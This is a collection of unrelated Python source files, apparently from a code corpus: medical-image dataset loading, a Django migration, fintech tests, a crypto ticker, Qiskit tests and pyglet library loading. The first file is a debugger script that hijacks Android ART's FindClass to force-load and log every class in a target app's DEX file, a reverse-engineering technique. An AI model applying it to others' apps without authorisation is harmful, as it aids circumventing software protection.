(int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod: brk_object.disable() def end_prolog(): # enable the FindClass breakpoint for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()): brk_object = execution_state.getBreakpointService().getBreakpoint(idx) if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass: brk_object.enable() def cleanup(): if mmu.page_table is not None: del mmu.page_table gc.collect() def FindClass(): # -- HEAD -- # start_prolog() # ensure that the LoadMethod breakpoint is enabled for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()): brk_object = execution_state.getBreakpointService().getBreakpoint(idx) if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod: brk_object.enable() # -- BODY -- # # get the "descriptor" parameter descriptor_param = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff descriptor_ptr = descriptor_param # read the "descriptor" string descriptor_string_val = memory.retrieve_char_array(descriptor_ptr) print "[FindClass] descriptor = %s" % descriptor_string_val if config.package_name.replace(".", "/") in descriptor_string_val: force_loading(descriptor_string_val) # -- TAIL -- # end_prolog_done() else: # -- TAIL -- # end_prolog() # continue the execution of the target application execution_state.getExecutionService().resume() cleanup() return # continue the execution of the target application execution_state.getExecutionService().resume() cleanup() return def force_loading(exclude_class): # save register values origin_R0_val = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff origin_R1_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff origin_R2_val = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff origin_R3_val = int(execution_state.getRegisterService().getValue("R3")) & 0xffffffff origin_R12_val = int(execution_state.getRegisterService().getValue("R12")) & 0xffffffff origin_SP_val = int(execution_state.getRegisterService().getValue("SP")) & 0xffffffff origin_LR_val = int(execution_state.getRegisterService().getValue("LR")) & 0xffffffff origin_CPSR_val = int(execution_state.getRegisterService().getValue("CPSR")) & 0xffffffff page_size = 0x1000 page_vtl_start_address = origin_SP_val - (origin_SP_val % page_size) print "[FindClass] origin SP = %0#10x" % origin_SP_val print "[FindClass] origin page = %0#10x" % page_vtl_start_address origin_content = execution_state.getMemoryService().read(page_vtl_start_address, page_size) print origin_content # retrieve dex_file_ptr and dex_file_size fp = open(os.path.join(config.workspace, config.log_file), "r") for range_info in fp.readlines(): range_info = range_info.replace("\n", "").strip() if "[DexFile]" in range_info: range_info = range_info.split(",")[0].split("=")[1].strip() break fp.close() dex_file_begin_val = int(range_info.split(", ")[0], 16) & 0xffffffff # retrieve loaded classes loaded_classes = [] loaded_classes.append(exclude_class) fp = open(os.path.join(config.workspace, config.log_file), "r") for class_info in fp.readlines(): class_info = class_info.replace("\n", "").strip() if "[LoadMethod] origin" in class_info: class_info = class_info.split(";")[0].split(" ")[-1].strip() class_info = class_info + ";" print "[FindClass] loaded class = %s" % class_info if not (class_info in loaded_classes): loaded_classes.append(class_info) fp.close() # resolve string_ids_off = header_item.get_string_ids_off(dex_file_begin_val) type_ids_off = header_item.get_type_ids_off(dex_file_begin_val) class_defs_size = header_item.get_class_defs_size(dex_file_begin_val) class_defs_off = header_item.get_class_defs_off(dex_file_begin_val) for class_def_idx in range(class_defs_size): class_idx = class_def_item.get_class_idx(dex_file_begin_val, class_defs_off, class_def_idx) class_descriptor_idx = type_id_item.get_descriptor_idx(dex_file_begin_val, type_ids_off, class_idx) class_descriptor_content = string_id_item.get_string_id_item_data(dex_file_begin_val, string_ids_off, class_descriptor_idx) if class_descriptor_content in loaded_classes: continue print "[FindClass] force descriptor = %s" % class_descriptor_content # hook execution_state.getRegisterService().setValue("R0", origin_R0_val) execution_state.getRegisterService().setValue("R1", origin_R1_val) descriptor_ptr = string_id_item.get_string_id_item_data_off(dex_file_begin_val, string_ids_off, class_descriptor_idx) print "[FindClass] force descriptor address = %0#10x" % descriptor_ptr execution_state.getRegisterService().setValue("R2", descriptor_ptr) descriptor_content = string_id_item.get_string_id_item_data(dex_file_begin_val, string_ids_off, class_descriptor_idx) print "[FindClass] force descriptor value = %s" % descriptor_content hash = ComputeModifiedUtf8Hash(descriptor_content) & 0xffffffff execution_state.getRegisterService().setValue("R3", hash) execution_state.getRegisterService().setValue("R12", origin_R12_val) execution_state.getRegisterService().setValue("SP", origin_SP_val) execution_state.getRegisterService().setValue("LR", origin_LR_val) execution_state.getRegisterService().setValue("CPSR", origin_CPSR_val) execution_state.getMemoryService().write(page_vtl_start_address, origin_content) # execute execution_state.getExecutionService().resumeTo(config.brk_FindClass_end) try: execution_state.getExecutionService().waitForStop(10 * 60 * 1000) # wait for 10mins except DebugException: raise RuntimeError("wtf !!!") execution_state.getRegisterService().setValue("PC", config.brk_FindClass) # recover register values execution_state.getRegisterService().setValue("R0", origin_R0_val) execution_state.getRegisterService().setValue("R1", origin_R1_val) execution_state.getRegisterService().setValue("R2", origin_R2_val) execution_state.getRegisterService().setValue("R3", origin_R3_val) execution_state.getRegisterService().setValue("R12", origin_R12_val) execution_state.getRegisterService().setValue("SP", origin_SP_val) execution_state.getRegisterService().setValue("LR", origin_LR_val) execution_state.getRegisterService().setValue("CPSR", origin_CPSR_val) post_content = execution_state.getMemoryService().read(page_vtl_start_address, page_size) print post_content execution_state.getMemoryService().write(page_vtl_start_address, origin_content) # execute execution_state.getExecutionService().resumeTo(config.brk_FindClass_end) try: execution_state.getExecutionService().waitForStop(10 * 60 * 1000) # wait for 10mins except DebugException: raise RuntimeError("wtf !!!") def ComputeModifiedUtf8Hash(input): hash = 0 input_bytes = bytes(input) for idx in range(len(input_bytes)): hash = hash * 31 + ord(input_bytes[idx]) return hash if __name__ == '__main__': FindClass() sys.exit()
py
1a3f78fbe04dc9ac80fb262eec7682bf8bc404a8
import os import torch import numpy as np import SimpleITK as sitk import random from torch.utils.data import Dataset class BraTS(Dataset): def __init__(self, root, phase, desired_depth=128, desired_height=160, desired_width=192, normalize_flag=True, scale_intensity_flag=False, shift_intesity_flag=False, flip_axes_flag=False): self.root = root self.patients = os.listdir(self.root) self.patients = [x for x in self.patients if x.startswith('BraTS')] self.flair_suffix = "_flair.nii.gz" self.t1_suffix = "_t1.nii.gz" self.t1ce_suffix = "_t1ce.nii.gz" self.t2_suffix = "_t2.nii.gz" self.seg_suffix = "_seg.nii.gz" self.wt_suffix = "_contour_wt.nii.gz" self.tc_suffix = "_contour_tc.nii.gz" self.et_suffix = "_contour_et.nii.gz" self.phase = phase self.desired_depth = desired_depth self.desired_height = desired_height self.desired_width = desired_width self.normalize_flag = normalize_flag self.scale_intensity_flag = scale_intensity_flag self.shift_intensity_flag = shift_intesity_flag self.flip_axes_flag = flip_axes_flag def __len__(self): return len(self.patients) def __getitem__(self, idx): patient = self.patients[idx] path_flair = os.path.join(self.root, patient, patient + self.flair_suffix) path_t1 = os.path.join(self.root, patient, patient + self.t1_suffix) path_t2 = os.path.join(self.root, patient, patient + self.t2_suffix) path_t1ce = os.path.join(self.root, patient, patient + self.t1ce_suffix) path_seg = os.path.join(self.root, patient, patient + self.seg_suffix) path_contour_wt = os.path.join(self.root, patient, patient + self.wt_suffix) path_contour_tc = os.path.join(self.root, patient, patient + self.tc_suffix) path_contour_et = os.path.join(self.root, patient, patient + self.et_suffix) mask, start_depth, start_height, start_width = self.get_mask_simple(path_seg) out = self.get_volume(path_flair, path_t1, path_t2, path_t1ce, start_depth, start_height, start_width) contours = self.get_contours(path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width) if self.flip_axes_flag: dice = random.uniform(0, 1) if dice > 0.5 and dice < 0.6: mask = mask[:, ::-1, : , :].copy() out = out[:, ::-1, : , :].copy() contours = contours[:, ::-1, : , :].copy() elif dice > 0.6 and dice < 0.7: mask = mask[:, :, ::-1 , :].copy() out = out[:, :, ::-1 , :].copy() contours = contours[:, :, ::-1 , :].copy() elif dice > 0.7 and dice < 0.8: mask = mask[:, :, : , ::-1].copy() out = out[:, :, : , ::-1].copy() contours = contours[:, :, : , ::-1].copy() elif dice > 0.8 and dice < 0.9: mask = mask[:, :, ::-1 , ::-1].copy() out = out[:, :, ::-1 , ::-1].copy() contours = contours[:, :, ::-1 , ::-1].copy() elif dice > 0.9 and dice < 1: mask = mask[:, ::-1, ::-1 , ::-1].copy() out = out[:, ::-1, ::-1 , ::-1].copy() contours = contours[:, ::-1, ::-1 , ::-1].copy() return torch.FloatTensor(out), torch.FloatTensor(mask), torch.FloatTensor(contours), patient def get_contours(self, path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width): depth = self.desired_depth height = self.desired_height width = self.desired_width try: contour_wt = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_wt))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width] except Exception as e: return np.zeros((self.desired_depth, self.desired_height, self.desired_width)) try: contour_tc = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_tc))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width] except Exception as e: return np.zeros((self.desired_depth, self.desired_height, self.desired_width)) try: contour_et = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_et))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width] except Exception as e: return np.zeros((self.desired_depth, self.desired_height, self.desired_width)) return np.stack((contour_wt, contour_tc, contour_et)) def normalize_one_volume(self, volume): new_volume = np.zeros(volume.shape) location = np.where(volume != 0) mean = np.mean(volume[location]) var = np.std(volume[location]) new_volume[location] = (volume[location] - mean) / var return new_volume def merge_volumes(self, *volumes): return np.stack(volumes, axis=0) def shift_intensity(self, volume): location = np.where(volume != 0) minimum = np.min(volume[location]) maximum = np.max(volume[location]) std = np.std(volume[location]) value = np.random.uniform(low=-0.1 * std, high=0.1 * std, size=1) volume[location] += value volume[location][volume[location] < minimum] = minimum volume[location][volume[location] > maximum] = maximum return volume def scale_intensity(self, volume): location = np.where(volume != 0) new_volume = np.zeros(volume.shape) IntensityScale = np.random.uniform(0.9, 1, 1) new_volume[location] = volume[location] * IntensityScale return new_volume def crop_volume(self, volume, start_depth, start_height, start_width): ### initial volumes are 155 X 240 X 240 depth = self.desired_depth height = self.desired_height width = self.desired_width return volume[:, start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width] def get_volume(self, path_flair, path_t1, path_t2, path_t1ce, start_depth, start_height, start_width): flair = sitk.GetArrayFromImage(sitk.ReadImage(path_flair)) t1 = sitk.GetArrayFromImage(sitk.ReadImage(path_t1)) t2 = sitk.GetArrayFromImage(sitk.ReadImage(path_t2)) t1ce = sitk.GetArrayFromImage(sitk.ReadImage(path_t1ce)) if self.desired_depth > 155: flair = np.concatenate([flair, np.zeros((self.desired_depth - 155, 240, 240))], axis=0) t1 = np.concatenate([t1, np.zeros((self.desired_depth - 155, 240, 240))], axis=0) t2 = np.concatenate([t2, np.zeros((self.desired_depth - 155, 240, 240))], axis=0) t1ce = np.concatenate([t1ce, np.zeros((self.desired_depth - 155, 240, 240))], axis=0) if self.scale_intensity_flag: flair = self.scale_intensity(flair) t1 = self.scale_intensity(t1) t2 = self.scale_intensity(t2) t1ce = self.scale_intensity(t1ce) if self.shift_intensity_flag: flair = self.shift_intensity(flair) t1 = self.shift_intensity(t1) t2 = self.shift_intensity(t2) t1ce = self.shift_intensity(t1ce) if self.normalize_flag == True: out = self.merge_volumes(self.normalize_one_volume(flair), self.normalize_one_volume(t2), self.normalize_one_volume(t1ce), self.normalize_one_volume(t1)) else: out = self.merge_volumes(flair, t2, t1ce, t1) out = self.crop_volume(out, start_depth, start_height, start_width) return out def get_mask_simple(self, path_seg): try: seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg)) except Exception as e: seg = np.zeros((155, 240, 240)) desired_depth = self.desired_depth desired_height = self.desired_height desired_width = self.desired_width if desired_depth <= 155: start_depth = np.random.randint(0, 156 - desired_depth) to_add = 0 else: start_depth = 0 to_add = desired_depth - 155 desired_depth = 155 start_height = np.random.randint(0, 241 - desired_height) start_width = np.random.randint(0, 241 - desired_width) end_depth = start_depth + desired_depth end_height = start_height + desired_height end_width = start_width + desired_width if to_add != 0: pad_seg = np.zeros((to_add, end_height - start_height, end_width - start_width)) new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width] if to_add != 0: new_seg = np.concatenate([new_seg, pad_seg], axis=0) final_seg = np.zeros((3, ) + new_seg.shape) final_seg[0, :, :, :][np.where(new_seg != 0)] = 1 final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1 final_seg[2, :, :, :][np.where(new_seg == 4)] = 1 return final_seg, start_depth, start_height, start_width def get_mask(self, path_seg): seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg)) location = np.where(seg != 0) min_depth, max_depth = np.min(location[0]), np.max(location[0]) min_height, max_height = np.min(location[1]), np.max(location[1]) min_width, max_width = np.min(location[2]), np.max(location[2]) desired_depth = self.desired_depth desired_height = self.desired_height desired_width = self.desired_width new_volume = np.zeros((desired_depth, desired_height, desired_width)) difference_depth = max_depth - min_depth difference_height = max_height - min_height difference_width = max_width - min_width if difference_depth < desired_depth: start_depth = np.random.randint(min_depth // 2, min_depth) end_depth = min(start_depth + desired_depth, 155) if end_depth == 155: start_depth = end_depth - desired_depth else: dice = np.random.uniform(0, 1) if dice > 0.5: start_depth = min_depth end_depth = start_depth + desired_depth else: end_depth = max_depth start_depth = max_depth - desired_depth if difference_height < desired_height: start_height = np.random.randint(min_height // 2, min_height) end_height = min(start_height + desired_height, 240) if end_height == 240: start_height = end_height - desired_height else: dice = np.random.uniform(0, 1) if dice > 0.5: start_height = min_height end_height = start_height + desired_height else: end_height = max_height start_height = max_height - desired_height if difference_width < desired_width: start_width = np.random.randint(min_width // 2, min_width) end_width = min(start_width + desired_width, 240) if end_width == 240: start_width = end_width - desired_width else: dice = np.random.uniform(0, 1) if dice > 0.5: start_width = min_width end_width = start_width + desired_width else: end_width = max_width start_width = max_width - desired_width new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width] final_seg = np.zeros((3, ) + new_seg.shape) final_seg[0, :, :, :][np.where(new_seg != 0)] = 1 final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1 final_seg[2, :, :, :][np.where(new_seg == 4)] = 1 return final_seg, start_depth, start_height, start_width
py
1a3f7a4adc3018d806a5388a4157f44203c2cbd5
# -*- coding: utf-8 -*- # Generated by Django 1.9.11 on 2016-12-01 05:24 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ("resolwe_bio", "0008_migrate_sample"), ] operations = [ migrations.AlterUniqueTogether(name="sample", unique_together=set([]),), migrations.RemoveField(model_name="sample", name="collections",), migrations.RemoveField(model_name="sample", name="contributor",), migrations.RemoveField(model_name="sample", name="data",), migrations.RemoveField(model_name="sample", name="descriptor_schema",), migrations.RemoveField(model_name="sample", name="public_processes",), migrations.DeleteModel(name="Sample",), ]
py
1a3f7ab88ee79216331b9a17dfe7703cf41e8da8
from . import generators as gen from datetime import date import pytest import settler as s # -- example-based tests -- @pytest.mark.parametrize('trade_date,tenor,expected', [ (date(2021, 11, 1), 'TOM', date(2021, 11, 2))]) def test_tenors_before_spot(trade_date, tenor, expected): vd = s.ValueDateCalculator() assert vd.value_date_for('USDSGD', tenor, trade_date) == expected @pytest.mark.parametrize('trade_date,tenor,expected', [ (date(2021, 11, 1), '1W', date(2021, 11, 10)), (date(2021, 11, 1), '1M', date(2021, 12, 3))]) def test_tenors_beyond_spot_starts_from_spot(trade_date, tenor, expected): vd = s.ValueDateCalculator() assert vd.value_date_for('USDSGD', tenor, trade_date) == expected
py
1a3f7aff08e3b61e58932921c7b335068d030eef
from enum import Enum, unique import json import re import requests from bs4 import BeautifulSoup BASE_URL = "https://min-api.cryptocompare.com/data/generateAvg?fsym=%s&tsym=%s&markets=%s" KOIMIM_URL = "https://koinim.com/ticker/" @unique class Markets(Enum): Paribu = 'Paribu' Koinim = 'Koinim' Cexio = 'Cexio' Bitstamp = 'Bitstamp' Bitfinex = 'Bitfinex' Poloniex = 'Poloniex' BTCE = 'BTCE' OKCoin = 'OKCoin' Coinbase = 'Coinbase' Kraken = 'Kraken' class Ticker: '''Ticker api for some popular markets.''' def __init__(self): self._market = None self._couple = None @property def pair(self): return self._couple @pair.setter def pair(self, value): self._couple = value return self._couple @property def market(self): return self._market @market.setter def market(self, value): self._market = value return self._market def ticker(self): couple = self._couple.split('/') request_url = BASE_URL % (couple[0], couple[1], self._market.value) result = self.__api_call(request_url) try: if self.market == Markets.Koinim and self.pair == 'BTC/TRY': result = { 'price': "₺ {:,.2f}".format(result['last_order']), 'volume24h': "Ƀ {:,.2f}".format(result['volume']), 'open24h': 'NaN', 'high24h': "₺ {:,.2f}".format(result['high']), 'low24h': "₺ {:,.2f}".format(result['low']), 'change24h': "% {:.2f}".format(result['change_rate']) } return result elif self.market == Markets.Paribu and self.pair == 'BTC/TRY': return self.paribu_ticker() result = { 'price': result['DISPLAY']['PRICE'], 'volume24h': result['DISPLAY']['VOLUME24HOUR'], 'open24h': result['DISPLAY']['OPEN24HOUR'], 'high24h': result['DISPLAY']['HIGH24HOUR'], 'low24h': result['DISPLAY']['LOW24HOUR'], 'change24h': result['DISPLAY']['CHANGE24HOUR'] } except KeyError: return None return result def paribu_ticker(self): html_doc = requests.get('https://www.paribu.com').text soup = BeautifulSoup(html_doc, 'html.parser') js_text = soup.find('script', type="text/javascript").text regex = re.compile('("day_stats"):(.*?)$|,', re.MULTILINE) js_text = re.findall(regex, js_text)[7][1] result = json.loads(re.sub("}}};", "", js_text)) result = { 'price': "₺ {:,.2f}".format(result['lst']), 'volume24h': "NaN", 'open24h': 'NaN', 'high24h': "₺ {:,.2f}".format(result['max']), 'low24h': "₺ {:,.2f}".format(result['min']), 'change24h': "₺ {:.2f}".format(result['chg']) } return result def __api_call(self, uri): if self.market == Markets.Koinim: result = requests.get(KOIMIM_URL).json() return result result = requests.get(uri).json() return result
py
1a3f7b3198f26dd443f6f7ee830dfc1a478a2965
# This code is part of Qiskit. # # (C) Copyright IBM 2018, 2021. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ Test AerPauliExpectation """ import itertools import unittest from test.python.opflow import QiskitOpflowTestCase import numpy as np from qiskit.circuit.library import RealAmplitudes from qiskit.opflow import ( CX, AerPauliExpectation, CircuitSampler, CircuitStateFn, H, I, ListOp, Minus, One, PauliExpectation, PauliSumOp, Plus, S, StateFn, X, Y, Z, Zero, ) from qiskit.utils import QuantumInstance class TestAerPauliExpectation(QiskitOpflowTestCase): """Pauli Change of Basis Expectation tests.""" def setUp(self) -> None: super().setUp() try: from qiskit import Aer self.seed = 97 self.backend = Aer.get_backend("aer_simulator") q_instance = QuantumInstance( self.backend, seed_simulator=self.seed, seed_transpiler=self.seed ) self.sampler = CircuitSampler(q_instance, attach_results=True) self.expect = AerPauliExpectation() except Exception as ex: # pylint: disable=broad-except self.skipTest(f"Aer doesn't appear to be installed. Error: '{str(ex)}'") return def test_pauli_expect_pair(self): """pauli expect pair test""" op = Z ^ Z # wvf = (Pl^Pl) + (Ze^Ze) wvf = CX @ (H ^ I) @ Zero converted_meas = self.expect.convert(~StateFn(op) @ wvf) sampled = self.sampler.convert(converted_meas) self.assertAlmostEqual(sampled.eval(), 0, delta=0.1) def test_pauli_expect_single(self): """pauli expect single test""" paulis = [Z, X, Y, I] states = [Zero, One, Plus, Minus, S @ Plus, S @ Minus] for pauli, state in itertools.product(paulis, states): converted_meas = self.expect.convert(~StateFn(pauli) @ state) matmulmean = state.adjoint().to_matrix() @ pauli.to_matrix() @ state.to_matrix() sampled = self.sampler.convert(converted_meas) self.assertAlmostEqual(sampled.eval(), matmulmean, delta=0.1) def test_pauli_expect_op_vector(self): """pauli expect op vector test""" paulis_op = ListOp([X, Y, Z, I]) converted_meas = self.expect.convert(~StateFn(paulis_op)) plus_mean = converted_meas @ Plus sampled_plus = self.sampler.convert(plus_mean) np.testing.assert_array_almost_equal(sampled_plus.eval(), [1, 0, 0, 1], decimal=1) minus_mean = converted_meas @ Minus sampled_minus = self.sampler.convert(minus_mean) np.testing.assert_array_almost_equal(sampled_minus.eval(), [-1, 0, 0, 1], decimal=1) zero_mean = converted_meas @ Zero sampled_zero = self.sampler.convert(zero_mean) np.testing.assert_array_almost_equal(sampled_zero.eval(), [0, 0, 1, 1], decimal=1) sum_zero = (Plus + Minus) * (0.5 ** 0.5) sum_zero_mean = converted_meas @ sum_zero sampled_zero_mean = self.sampler.convert(sum_zero_mean) # !!NOTE!!: Depolarizing channel (Sampling) means interference # does not happen between circuits in sum, so expectation does # not equal expectation for Zero!! np.testing.assert_array_almost_equal(sampled_zero_mean.eval(), [0, 0, 0, 1]) def test_pauli_expect_state_vector(self): """pauli expect state vector test""" states_op = ListOp([One, Zero, Plus, Minus]) paulis_op = X converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op) sampled = self.sampler.convert(converted_meas) # Small test to see if execution results are accessible for composed_op in sampled: self.assertTrue(hasattr(composed_op[0], "execution_results")) np.testing.assert_array_almost_equal(sampled.eval(), [0, 0, 1, -1], decimal=1) def test_pauli_expect_op_vector_state_vector(self): """pauli expect op vector state vector test""" paulis_op = ListOp([X, Y, Z, I]) states_op = ListOp([One, Zero, Plus, Minus]) valids = [ [+0, 0, 1, -1], [+0, 0, 0, 0], [-1, 1, 0, -0], [+1, 1, 1, 1], ] converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op) sampled = self.sampler.convert(converted_meas) np.testing.assert_array_almost_equal(sampled.eval(), valids, decimal=1) def test_multi_representation_ops(self): """Test observables with mixed representations""" mixed_ops = ListOp([X.to_matrix_op(), H, H + I, X]) converted_meas = self.expect.convert(~StateFn(mixed_ops)) plus_mean = converted_meas @ Plus sampled_plus = self.sampler.convert(plus_mean) np.testing.assert_array_almost_equal( sampled_plus.eval(), [1, 0.5 ** 0.5, (1 + 0.5 ** 0.5), 1], decimal=1 ) @unittest.skip("Skip until https://github.com/Qiskit/qiskit-aer/issues/1249 is closed.") def test_parameterized_qobj(self): """grouped pauli expectation test""" two_qubit_h2 = ( (-1.052373245772859 * I ^ I) + (0.39793742484318045 * I ^ Z) + (-0.39793742484318045 * Z ^ I) + (-0.01128010425623538 * Z ^ Z) + (0.18093119978423156 * X ^ X) ) aer_sampler = CircuitSampler( self.sampler.quantum_instance, param_qobj=True, attach_results=True ) ansatz = RealAmplitudes() ansatz.num_qubits = 2 observable_meas = self.expect.convert(StateFn(two_qubit_h2, is_measurement=True)) ansatz_circuit_op = CircuitStateFn(ansatz) expect_op = observable_meas.compose(ansatz_circuit_op).reduce() def generate_parameters(num): param_bindings = {} for param in ansatz.parameters: values = [] for _ in range(num): values.append(np.random.rand()) param_bindings[param] = values return param_bindings def validate_sampler(ideal, sut, param_bindings): expect_sampled = ideal.convert(expect_op, params=param_bindings).eval() actual_sampled = sut.convert(expect_op, params=param_bindings).eval() self.assertTrue( np.allclose(actual_sampled, expect_sampled), f"{actual_sampled} != {expect_sampled}", ) def get_circuit_templates(sampler): return sampler._transpiled_circ_templates def validate_aer_binding_used(templates): self.assertIsNotNone(templates) def validate_aer_templates_reused(prev_templates, cur_templates): self.assertIs(prev_templates, cur_templates) validate_sampler(self.sampler, aer_sampler, generate_parameters(1)) cur_templates = get_circuit_templates(aer_sampler) validate_aer_binding_used(cur_templates) prev_templates = cur_templates validate_sampler(self.sampler, aer_sampler, generate_parameters(2)) cur_templates = get_circuit_templates(aer_sampler) validate_aer_templates_reused(prev_templates, cur_templates) prev_templates = cur_templates validate_sampler(self.sampler, aer_sampler, generate_parameters(2)) # same num of params cur_templates = get_circuit_templates(aer_sampler) validate_aer_templates_reused(prev_templates, cur_templates) def test_pauli_expectation_param_qobj(self): """Test PauliExpectation with param_qobj""" q_instance = QuantumInstance( self.backend, seed_simulator=self.seed, seed_transpiler=self.seed, shots=10000 ) qubit_op = (0.1 * I ^ I) + (0.2 * I ^ Z) + (0.3 * Z ^ I) + (0.4 * Z ^ Z) + (0.5 * X ^ X) ansatz = RealAmplitudes(qubit_op.num_qubits) ansatz_circuit_op = CircuitStateFn(ansatz) observable = PauliExpectation().convert(~StateFn(qubit_op)) expect_op = observable.compose(ansatz_circuit_op).reduce() params1 = {} params2 = {} for param in ansatz.parameters: params1[param] = [0] params2[param] = [0, 0] sampler1 = CircuitSampler(backend=q_instance, param_qobj=False) samples1 = sampler1.convert(expect_op, params=params1) val1 = np.real(samples1.eval())[0] samples2 = sampler1.convert(expect_op, params=params2) val2 = np.real(samples2.eval()) sampler2 = CircuitSampler(backend=q_instance, param_qobj=True) samples3 = sampler2.convert(expect_op, params=params1) val3 = np.real(samples3.eval()) samples4 = sampler2.convert(expect_op, params=params2) val4 = np.real(samples4.eval()) np.testing.assert_array_almost_equal([val1] * 2, val2, decimal=2) np.testing.assert_array_almost_equal(val1, val3, decimal=2) np.testing.assert_array_almost_equal([val1] * 2, val4, decimal=2) def test_list_pauli_sum(self): """Test AerPauliExpectation for ListOp[PauliSumOp]""" test_op = ListOp([PauliSumOp.from_list([("XX", 1), ("ZI", 3), ("ZZ", 5)])]) observable = AerPauliExpectation().convert(~StateFn(test_op)) self.assertIsInstance(observable, ListOp) self.assertIsInstance(observable[0], CircuitStateFn) self.assertTrue(observable[0].is_measurement) def test_expectation_with_coeff(self): """Test AerPauliExpectation with coefficients.""" with self.subTest("integer coefficients"): exp = 3 * ~StateFn(X) @ (2 * Minus) target = self.sampler.convert(self.expect.convert(exp)).eval() self.assertEqual(target, -12) with self.subTest("complex coefficients"): exp = 3j * ~StateFn(X) @ (2j * Minus) target = self.sampler.convert(self.expect.convert(exp)).eval() self.assertEqual(target, -12j) if __name__ == "__main__": unittest.main()
py
1a3f7c07497c87dc6f66cb1c5a3c00f92dfd67aa
# ---------------------------------------------------------------------------- # pyglet # Copyright (c) 2006-2008 Alex Holkner # Copyright (c) 2008-2020 pyglet contributors # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # * Neither the name of pyglet nor the names of its # contributors may be used to endorse or promote products # derived from this software without specific prior written # permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ---------------------------------------------------------------------------- """Functions for loading dynamic libraries. These extend and correct ctypes functions. """ import os import re import sys import ctypes import ctypes.util import pyglet _debug_lib = pyglet.options['debug_lib'] _debug_trace = pyglet.options['debug_trace'] _is_pyglet_doc_run = getattr(sys, "is_pyglet_doc_run", False) if pyglet.options['search_local_libs']: script_path = pyglet.resource.get_script_home() cwd = os.getcwd() _local_lib_paths = [script_path, os.path.join(script_path, 'lib'), os.path.join(cwd, 'lib')] if pyglet.compat_platform == 'win32': os.environ["PATH"] += os.pathsep + os.pathsep.join(_local_lib_paths) else: _local_lib_paths = None class _TraceFunction: def __init__(self, func): self.__dict__['_func'] = func def __str__(self): return self._func.__name__ def __call__(self, *args, **kwargs): return self._func(*args, **kwargs) def __getattr__(self, name): return getattr(self._func, name) def __setattr__(self, name, value): setattr(self._func, name, value) class _TraceLibrary: def __init__(self, library): self._library = library print(library) def __getattr__(self, name): func = getattr(self._library, name) f = _TraceFunction(func) return f if _is_pyglet_doc_run: class LibraryMock: """Mock library used when generating documentation.""" def __getattr__(self, name): return LibraryMock() def __setattr__(self, name, value): pass def __call__(self, *args, **kwargs): return LibraryMock() class LibraryLoader: platform = pyglet.compat_platform # this is only for library loading, don't include it in pyglet.platform if platform == 'cygwin': platform = 'win32' def load_library(self, *names, **kwargs): """Find and load a library. More than one name can be specified, they will be tried in order. Platform-specific library names (given as kwargs) are tried first. Raises ImportError if library is not found. """ if _is_pyglet_doc_run: return LibraryMock() if 'framework' in kwargs and self.platform == 'darwin': return self.load_framework(kwargs['framework']) if not names: raise ImportError("No library name specified") platform_names = kwargs.get(self.platform, []) if isinstance(platform_names, str): platform_names = [platform_names] elif type(platform_names) is tuple: platform_names = list(platform_names) if self.platform.startswith('linux'): for name in names: libname = self.find_library(name) platform_names.append(libname or 'lib%s.so' % name) platform_names.extend(names) for name in platform_names: try: lib = ctypes.cdll.LoadLibrary(name) if _debug_lib: print(name) if _debug_trace: lib = _TraceLibrary(lib) return lib except OSError as o: path = self.find_library(name) if path: try: lib = ctypes.cdll.LoadLibrary(path) if _debug_lib: print(path) if _debug_trace: lib = _TraceLibrary(lib) return lib except OSError: pass elif self.platform == "win32" and o.winerror != 126: raise ImportError("Unexpected error loading library %s: %s" % (name, str(o))) 